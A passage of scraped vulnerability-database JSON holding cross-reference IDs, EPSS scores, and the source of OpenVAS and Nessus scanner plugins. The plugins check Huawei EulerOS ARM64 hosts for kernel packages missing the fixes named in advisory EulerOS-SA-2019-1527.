"UBUNTU_USN-3209-1.NASL", "UBUNTU_USN-3583-1.NASL", "VIRTUOZZO_VZLSA-2017-0293.NASL", "VIRTUOZZO_VZLSA-2017-0294.NASL", "VIRTUOZZO_VZLSA-2017-0323.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123032", "OPENVAS:1361412562310841737", "OPENVAS:1361412562310842108", "OPENVAS:1361412562310842384", "OPENVAS:1361412562310843060", "OPENVAS:1361412562310843061", "OPENVAS:1361412562310843062", "OPENVAS:1361412562310843212", "OPENVAS:1361412562310843461", "OPENVAS:1361412562310850626", "OPENVAS:1361412562310850746", "OPENVAS:1361412562310851515", "OPENVAS:1361412562310851516", "OPENVAS:1361412562310851548", "OPENVAS:1361412562310852048", "OPENVAS:1361412562310867852", "OPENVAS:1361412562310869476", "OPENVAS:1361412562310871452", "OPENVAS:1361412562310871761", "OPENVAS:1361412562310871762", "OPENVAS:1361412562310871765", "OPENVAS:1361412562310872418", "OPENVAS:1361412562310872419", "OPENVAS:1361412562310882664", "OPENVAS:1361412562310882665", "OPENVAS:1361412562310882668", "OPENVAS:1361412562310882674", "OPENVAS:703791"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-1801", "ELSA-2013-2587", "ELSA-2013-2588", "ELSA-2013-2589", "ELSA-2014-3002", "ELSA-2014-3043", "ELSA-2017-0293", "ELSA-2017-0294", "ELSA-2017-0294-1", "ELSA-2017-0323", "ELSA-2017-0323-1", "ELSA-2017-3520", "ELSA-2017-3521", "ELSA-2017-3522", "ELSA-2018-1062", "ELSA-2019-4742"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141331", "PACKETSTORM:141339"]}, {"type": "paloalto", "idList": ["PAN-SA-2016-0025"]}, {"type": "photon", "idList": ["PHSA-2017-0005", "PHSA-2018-1.0-0122"]}, {"type": "redhat", "idList": ["RHSA-2013:1801", "RHSA-2013:1802", "RHSA-2014:0100", "RHSA-2014:0284", "RHSA-2016:0064", "RHSA-2017:0293", "RHSA-2017:0294", "RHSA-2017:0316", "RHSA-2017:0323", "RHSA-2017:0324", "RHSA-2017:0345", "RHSA-2017:0346", "RHSA-2017:0365", "RHSA-2017:0366", "RHSA-2017:0403"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-10318", "RH:CVE-2017-12192"]}, {"type": "securityvulns", "idList": 
["SECURITYVULNS:DOC:30431", "SECURITYVULNS:VULN:13997"]}, {"type": "seebug", "idList": ["SSV:92700"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:0301-1", "OPENSUSE-SU-2017:0541-1", "OPENSUSE-SU-2017:0547-1", "SUSE-SU-2018:0040-1"]}, {"type": "symantec", "idList": ["SMNTC-1349"]}, {"type": "thn", "idList": ["THN:11E7CC33794D9968747131F3F0AE8716"]}, {"type": "threatpost", "idList": ["THREATPOST:178E0668804E2DA1322D2C1DCF6CA893"]}, {"type": "ubuntu", "idList": ["USN-2446-1", "USN-2908-5", "USN-2932-1", "USN-2947-1", "USN-2947-2", "USN-2947-3", "USN-2948-1", "USN-2948-2", "USN-2967-1", "USN-2967-2", "USN-3208-2", "USN-3209-1", "USN-3343-2", "USN-3487-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2014-9428", "UB:CVE-2017-18203", "UB:CVE-2017-18344"]}, {"type": "virtuozzo", "idList": ["VZA-2017-016", "VZA-2018-050", "VZA-2018-052"]}, {"type": "zdt", "idList": ["1337DAY-ID-27133", "1337DAY-ID-27134"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2015-8787", "epss": "0.041610000", "percentile": "0.908580000", "modified": "2023-03-15"}, {"cve": "CVE-2014-0131", "epss": "0.001390000", "percentile": "0.477240000", "modified": "2023-03-15"}, {"cve": "CVE-2016-4794", "epss": "0.000420000", "percentile": "0.056320000", "modified": "2023-03-15"}, {"cve": "CVE-2017-6074", "epss": "0.000430000", "percentile": "0.074530000", "modified": "2023-03-15"}, {"cve": "CVE-2014-8134", "epss": "0.001570000", "percentile": "0.503560000", "modified": "2023-03-15"}, {"cve": "CVE-2016-2069", "epss": "0.001430000", "percentile": "0.484510000", "modified": "2023-03-15"}, {"cve": "CVE-2015-5364", "epss": "0.276230000", "percentile": "0.960630000", "modified": "2023-03-15"}, {"cve": "CVE-2014-9410", "epss": "0.002220000", "percentile": "0.586920000", "modified": "2023-03-15"}, {"cve": "CVE-2017-18203", "epss": "0.000440000", "percentile": "0.082290000", "modified": "2023-03-15"}, {"cve": "CVE-2014-9940", "epss": "0.000810000", "percentile": "0.330280000", "modified": "2023-03-15"}, {"cve": 
"CVE-2014-1874", "epss": "0.000440000", "percentile": "0.082290000", "modified": "2023-03-15"}, {"cve": "CVE-2014-3181", "epss": "0.002400000", "percentile": "0.602530000", "modified": "2023-03-15"}, {"cve": "CVE-2015-8812", "epss": "0.040070000", "percentile": "0.906800000", "modified": "2023-03-15"}, {"cve": "CVE-2017-12192", "epss": "0.000420000", "percentile": "0.056320000", "modified": "2023-03-15"}, {"cve": "CVE-2016-0728", "epss": "0.000430000", "percentile": "0.074530000", "modified": "2023-03-15"}, {"cve": "CVE-2015-5327", "epss": "0.001200000", "percentile": "0.444440000", "modified": "2023-03-15"}, {"cve": "CVE-2016-10318", "epss": "0.001810000", "percentile": "0.535420000", "modified": "2023-03-15"}, {"cve": "CVE-2017-18344", "epss": "0.000820000", "percentile": "0.333790000", "modified": "2023-03-15"}, {"cve": "CVE-2014-9428", "epss": "0.128970000", "percentile": "0.945680000", "modified": "2023-03-15"}, {"cve": "CVE-2013-4470", "epss": "0.001100000", "percentile": "0.423670000", "modified": "2023-03-15"}], "vulnersScore": 0.2}, "_state": {"dependencies": 1678957314, "score": 1683999172, "epss": 1678957426}, "_internal": {"score_hash": "78f3adf0b9ed13068d3da7f807e73b6c"}, "pluginID": "1361412562311220191527", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1527\");\n script_version(\"2020-02-05T08:56:28+0000\");\n script_cve_id(\"CVE-2013-4470\", \"CVE-2014-0131\", \"CVE-2014-1874\", \"CVE-2014-3181\", \"CVE-2014-8134\", \"CVE-2014-9410\", \"CVE-2014-9428\", \"CVE-2014-9940\", \"CVE-2015-5327\", \"CVE-2015-5364\", \"CVE-2015-8787\", \"CVE-2015-8812\", \"CVE-2016-0728\", \"CVE-2016-10318\", \"CVE-2016-2069\", \"CVE-2016-4794\", \"CVE-2017-12192\", \"CVE-2017-18203\", \"CVE-2017-18344\", \"CVE-2017-6074\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-05 08:56:28 +0000 (Wed, 05 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:05:12 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1527)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1527\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1527\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1527 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable 
package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Linux kernel, before version 4.14.3, is vulnerable to a denial of service in drivers/md/dm.c:dm_get_from_kobject() which can be caused by local users leveraging a race condition with __dm_destroy() during creation and removal of DM devices. Only privileged local users (with CAP_SYS_ADMIN capability) can directly perform the ioctl operations for dm device creation and removal and this would typically be outside the direct control of the unprivileged attacker.(CVE-2017-18203)\n\nThe batadv_frag_merge_packets function in net/batman-adv/fragmentation.c in the B.A.T.M.A.N. implementation in the Linux kernel through 3.18.1 uses an incorrect length field during a calculation of an amount of memory, which allows remote attackers to cause a denial of service (mesh-node system crash) via fragmented packets.(CVE-2014-9428)\n\nThe regulator_ena_gpio_free function in drivers/regulator/core.c in the Linux kernel allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted application.(CVE-2014-9940)\n\nThe Linux kernel before 3.12, when UDP Fragmentation Offload (UFO) is enabled, does not properly initialize certain data structures, which allows local users to cause a denial of service (memory corruption and system crash) or possibly gain privileges via a crafted application that uses the UDP_CORK option in a setsockopt system call and sends both short and long packets, related to the ip_ufo_append_data function in net/ipv4/ip_output.c and the ip6_ufo_append_data function in net/ipv6/ip6_output.c.(CVE-2013-4470)\n\nA use-after-free flaw was found in the way the Linux kernel's Datagram Congestion Control Protocol (DCCP) implementation freed SKB (socket buffer) resources for a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO option is set on the socket. 
A local, unprivileged user could use this flaw to alter the kernel memory, allowing them to escalate their privileges on the system.(CVE-2017-6074)\n\nA NULL-pointer dereference vulnerability was found in the Linux kernel's TCP stack, in net/netfilter/nf_nat_redirect.c in the nf_nat_redirect_ipv4() function. A remote, unauthenticated user could exploit this flaw to create a system crash (denial of service).(CVE-2015-8787)\n\nA use-after-free flaw was found in the CXGB3 kernel driver when the network was considered to be congested. The kernel incorrectly misinterpreted the congestion as an error condition and incorrectly freed or cleaned up the socket buffer (skb). When the device then sent the skb's queued data, these structures were referenced. A local attacker could use this flaw to panic the system (denia ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.19.28~1.2.117\", 
rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "naslFamily": "Huawei EulerOS Local Security Checks"}
{"nessus": [{"lastseen": "2021-12-23T02:30:33", "description": "According to the versions of the kernel packages installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities :\n\n - The Linux kernel, before version 4.14.3, is vulnerable to a denial of service in drivers/md/dm.c:dm_get_from_kobject() which can be caused by local users leveraging a race condition with\n __dm_destroy() during creation and removal of DM devices. Only privileged local users (with CAP_SYS_ADMIN capability) can directly perform the ioctl operations for dm device creation and removal and this would typically be outside the direct control of the unprivileged attacker.(CVE-2017-18203)\n\n - The batadv_frag_merge_packets function in net/batman-adv/fragmentation.c in the B.A.T.M.A.N.\n implementation in the Linux kernel through 3.18.1 uses an incorrect length field during a calculation of an amount of memory, which allows remote attackers to cause a denial of service (mesh-node system crash) via fragmented packets.(CVE-2014-9428)\n\n - The regulator_ena_gpio_free function in drivers/regulator/core.c in the Linux kernel allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted application.(CVE-2014-9940)\n\n - The Linux kernel before 3.12, when UDP Fragmentation Offload (UFO) is enabled, does not properly initialize certain data structures, which allows local users to cause a denial of service (memory corruption and system crash) or possibly gain privileges via a crafted application that uses the UDP_CORK option in a setsockopt system call and sends both short and long packets, related to the ip_ufo_append_data function in net/ipv4/ip_output.c and the ip6_ufo_append_data function in net/ipv6/ip6_output.c.(CVE-2013-4470)\n\n - A use-after-free flaw was found in the way the Linux kernel's Datagram Congestion Control Protocol (DCCP) implementation freed SKB (socket buffer) 
resources for a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO option is set on the socket. A local, unprivileged user could use this flaw to alter the kernel memory, allowing them to escalate their privileges on the system.(CVE-2017-6074)\n\n - A NULL-pointer dereference vulnerability was found in the Linux kernel's TCP stack, in net/netfilter/nf_nat_redirect.c in the nf_nat_redirect_ipv4() function. A remote, unauthenticated user could exploit this flaw to create a system crash (denial of service).(CVE-2015-8787)\n\n - A use-after-free flaw was found in the CXGB3 kernel driver when the network was considered to be congested.\n The kernel incorrectly misinterpreted the congestion as an error condition and incorrectly freed or cleaned up the socket buffer (skb). When the device then sent the skb's queued data, these structures were referenced. A local attacker could use this flaw to panic the system (denial of service) or, with a local account, escalate their privileges.(CVE-2015-8812)\n\n - A flaw was found in the way the Linux kernel's networking implementation handled UDP packets with incorrect checksum values. A remote attacker could potentially use this flaw to trigger an infinite loop in the kernel, resulting in a denial of service on the system, or cause a denial of service in applications using the edge triggered epoll functionality.(CVE-2015-5364)\n\n - The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel doesn't properly validate the sigevent->sigev_notify field, which leads to out-of-bounds access in the show_timer function.(CVE-2017-18344)\n\n - A flaw was discovered in the way the Linux kernel dealt with paging structures. When the kernel invalidated a paging structure that was not in use locally, it could, in principle, race against another CPU that is switching to a process that uses the paging structure in question. 
A local user could use a thread running with a stale cached virtual->physical translation to potentially escalate their privileges if the translation in question were writable and the physical page got reused for something critical (for example, a page table).(CVE-2016-2069)\n\n - Use after free vulnerability was found in percpu using previously allocated memory in bpf. First\n __alloc_percpu_gfp() is called, then the memory is freed with free_percpu() which triggers async pcpu_balance_work and then pcpu_extend_area_map could use a chunk after it has been freed.(CVE-2016-4794)\n\n - A missing authorization check in the fscrypt_process_policy function in fs/crypto/policy.c in the ext4 and f2fs filesystem encryption support in the Linux kernel allows a user to assign an encryption policy to a directory owned by a different user, potentially creating a denial of service.(CVE-2016-10318)\n\n - The security_context_to_sid_core function in security/selinux/ss/services.c in the Linux kernel before 3.13.4 allows local users to cause a denial of service (system crash) by leveraging the CAP_MAC_ADMIN capability to set a zero-length security context.(CVE-2014-1874)\n\n - The vfe31_proc_general function in drivers/media/video/msm/vfe/msm_vfe31.c in the MSM-VFE31 driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, does not validate a certain id value, which allows attackers to gain privileges or cause a denial of service (memory corruption) via an application that makes a crafted ioctl call.(CVE-2014-9410)\n\n - A vulnerability was found in the Key Management sub component of the Linux kernel, where when trying to issue a KEYCTL_READ on a negative key would lead to a NULL pointer dereference. 
A local attacker could use this flaw to crash the kernel.(CVE-2017-12192)\n\n - Out-of-bounds memory read in the x509_decode_time function in x509_cert_parser.c in Linux kernels 4.3-rc1 and after.(CVE-2015-5327)\n\n - It was found that the espfix functionality does not work for 32-bit KVM paravirtualized guests. A local, unprivileged guest user could potentially use this flaw to leak kernel stack addresses.(CVE-2014-8134)\n\n - An out-of-bounds write flaw was found in the way the Apple Magic Mouse/Trackpad multi-touch driver handled Human Interface Device (HID) reports with an invalid size. An attacker with physical access to the system could use this flaw to crash the system or, potentially, escalate their privileges on the system.(CVE-2014-3181)\n\n - A use-after-free flaw was found in the way the Linux kernel's key management subsystem handled keyring object reference counting in certain error path of the join_session_keyring() function. A local, unprivileged user could use this flaw to escalate their privileges on the system.(CVE-2016-0728)\n\n - Use-after-free vulnerability in the skb_segment function in net/core/skbuff.c in the Linux kernel through 3.13.6 allows attackers to obtain sensitive information from kernel memory by leveraging the absence of a certain orphaning operation.(CVE-2014-0131)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1527)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4470", "CVE-2014-0131", "CVE-2014-1874", "CVE-2014-3181", "CVE-2014-8134", "CVE-2014-9410", "CVE-2014-9428", "CVE-2014-9940", "CVE-2015-5327", "CVE-2015-5364", "CVE-2015-8787", "CVE-2015-8812", "CVE-2016-0728", "CVE-2016-10318", "CVE-2016-2069", "CVE-2016-4794", "CVE-2017-12192", "CVE-2017-18203", "CVE-2017-18344", "CVE-2017-6074"], "modified": "2021-02-08T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:python-perf", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1527.NASL", "href": "https://www.tenable.com/plugins/nessus/124980", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124980);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\n \"CVE-2013-4470\",\n \"CVE-2014-0131\",\n \"CVE-2014-1874\",\n \"CVE-2014-3181\",\n \"CVE-2014-8134\",\n \"CVE-2014-9410\",\n \"CVE-2014-9428\",\n \"CVE-2014-9940\",\n \"CVE-2015-5327\",\n \"CVE-2015-5364\",\n \"CVE-2015-8787\",\n \"CVE-2015-8812\",\n \"CVE-2016-0728\",\n \"CVE-2016-10318\",\n \"CVE-2016-2069\",\n \"CVE-2016-4794\",\n \"CVE-2017-12192\",\n \"CVE-2017-18203\",\n \"CVE-2017-18344\",\n \"CVE-2017-6074\"\n );\n script_bugtraq_id(\n 63359,\n 65459,\n 66101,\n 69779,\n 71650,\n 71847,\n 
75510\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1527)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - The Linux kernel, before version 4.14.3, is vulnerable\n to a denial of service in\n drivers/md/dm.c:dm_get_from_kobject() which can be\n caused by local users leveraging a race condition with\n __dm_destroy() during creation and removal of DM\n devices. Only privileged local users (with\n CAP_SYS_ADMIN capability) can directly perform the\n ioctl operations for dm device creation and removal and\n this would typically be outside the direct control of\n the unprivileged attacker.(CVE-2017-18203i1/4%0\n\n - The batadv_frag_merge_packets function in\n net/batman-adv/fragmentation.c in the B.A.T.M.A.N.\n implementation in the Linux kernel through 3.18.1 uses\n an incorrect length field during a calculation of an\n amount of memory, which allows remote attackers to\n cause a denial of service (mesh-node system crash) via\n fragmented packets.(CVE-2014-9428i1/4%0\n\n - The regulator_ena_gpio_free function in\n drivers/regulator/core.c in the Linux kernel allows\n local users to gain privileges or cause a denial of\n service (use-after-free) via a crafted\n application.(CVE-2014-9940i1/4%0\n\n - The Linux kernel before 3.12, when UDP Fragmentation\n Offload (UFO) is enabled, does not properly initialize\n certain data structures, which allows local users to\n cause a denial of service (memory corruption and system\n crash) or possibly gain privileges via a crafted\n application that uses the 
UDP_CORK option in a\n setsockopt system call and sends both short and long\n packets, related to the ip_ufo_append_data function in\n net/ipv4/ip_output.c and the ip6_ufo_append_data\n function in net/ipv6/ip6_output.c.(CVE-2013-4470i1/4%0\n\n - A use-after-free flaw was found in the way the Linux\n kernel's Datagram Congestion Control Protocol (DCCP)\n implementation freed SKB (socket buffer) resources for\n a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO\n option is set on the socket. A local, unprivileged user\n could use this flaw to alter the kernel memory,\n allowing them to escalate their privileges on the\n system.(CVE-2017-6074i1/4%0\n\n - A NULL-pointer dereference vulnerability was found in\n the Linux kernel's TCP stack, in\n net/netfilter/nf_nat_redirect.c in the\n nf_nat_redirect_ipv4() function. A remote,\n unauthenticated user could exploit this flaw to create\n a system crash (denial of service).(CVE-2015-8787i1/4%0\n\n - A use-after-free flaw was found in the CXGB3 kernel\n driver when the network was considered to be congested.\n The kernel incorrectly misinterpreted the congestion as\n an error condition and incorrectly freed or cleaned up\n the socket buffer (skb). When the device then sent the\n skb's queued data, these structures were referenced. A\n local attacker could use this flaw to panic the system\n (denial of service) or, with a local account, escalate\n their privileges.(CVE-2015-8812i1/4%0\n\n - A flaw was found in the way the Linux kernel's\n networking implementation handled UDP packets with\n incorrect checksum values. 
A remote attacker could\n potentially use this flaw to trigger an infinite loop\n in the kernel, resulting in a denial of service on the\n system, or cause a denial of service in applications\n using the edge triggered epoll\n functionality.(CVE-2015-5364i1/4%0\n\n - The timer_create syscall implementation in\n kernel/time/posix-timers.c in the Linux kernel doesn't\n properly validate the sigevent-i1/4zsigev_notify field,\n which leads to out-of-bounds access in the show_timer\n function.(CVE-2017-18344i1/4%0\n\n - A flaw was discovered in the way the Linux kernel dealt\n with paging structures. When the kernel invalidated a\n paging structure that was not in use locally, it could,\n in principle, race against another CPU that is\n switching to a process that uses the paging structure\n in question. A local user could use a thread running\n with a stale cached virtual-i1/4zphysical translation to\n potentially escalate their privileges if the\n translation in question were writable and the physical\n page got reused for something critical (for example, a\n page table).(CVE-2016-2069i1/4%0\n\n - Use after free vulnerability was found in percpu using\n previously allocated memory in bpf. 
First\n __alloc_percpu_gfp() is called, then the memory is\n freed with free_percpu() which triggers async\n pcpu_balance_work and then pcpu_extend_area_map could\n use a chunk after it has been freed.(CVE-2016-4794i1/4%0\n\n - A missing authorization check in the\n fscrypt_process_policy function in fs/crypto/policy.c\n in the ext4 and f2fs filesystem encryption support in\n the Linux kernel allows a user to assign an encryption\n policy to a directory owned by a different user,\n potentially creating a denial of\n service.(CVE-2016-10318i1/4%0\n\n - The security_context_to_sid_core function in\n security/selinux/ss/services.c in the Linux kernel\n before 3.13.4 allows local users to cause a denial of\n service (system crash) by leveraging the CAP_MAC_ADMIN\n capability to set a zero-length security\n context.(CVE-2014-1874i1/4%0\n\n - The vfe31_proc_general function in\n drivers/media/video/msm/vfe/msm_vfe31.c in the\n MSM-VFE31 driver for the Linux kernel 3.x, as used in\n Qualcomm Innovation Center (QuIC) Android contributions\n for MSM devices and other products, does not validate a\n certain id value, which allows attackers to gain\n privileges or cause a denial of service (memory\n corruption) via an application that makes a crafted\n ioctl call.(CVE-2014-9410i1/4%0\n\n - A vulnerability was found in the Key Management sub\n component of the Linux kernel, where when trying to\n issue a KEYTCL_READ on a negative key would lead to a\n NULL pointer dereference. A local attacker could use\n this flaw to crash the kernel.(CVE-2017-12192i1/4%0\n\n - Out-of-bounds memory read in the x509_decode_time\n function in x509_cert_parser.c in Linux kernels 4.3-rc1\n and after.(CVE-2015-5327i1/4%0\n\n - It was found that the espfix functionality does not\n work for 32-bit KVM paravirtualized guests. 
A local,\n unprivileged guest user could potentially use this flaw\n to leak kernel stack addresses.(CVE-2014-8134i1/4%0\n\n - An out-of-bounds write flaw was found in the way the\n Apple Magic Mouse/Trackpad multi-touch driver handled\n Human Interface Device (HID) reports with an invalid\n size. An attacker with physical access to the system\n could use this flaw to crash the system or,\n potentially, escalate their privileges on the\n system.(CVE-2014-3181i1/4%0\n\n - A use-after-free flaw was found in the way the Linux\n kernel's key management subsystem handled keyring\n object reference counting in certain error path of the\n join_session_keyring() function. A local, unprivileged\n user could use this flaw to escalate their privileges\n on the system.(CVE-2016-0728i1/4%0\n\n - Use-after-free vulnerability in the skb_segment\n function in net/core/skbuff.c in the Linux kernel\n through 3.13.6 allows attackers to obtain sensitive\n information from kernel memory by leveraging the\n absence of a certain orphaning\n operation.(CVE-2014-0131i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1527\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dfd6ac3d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, 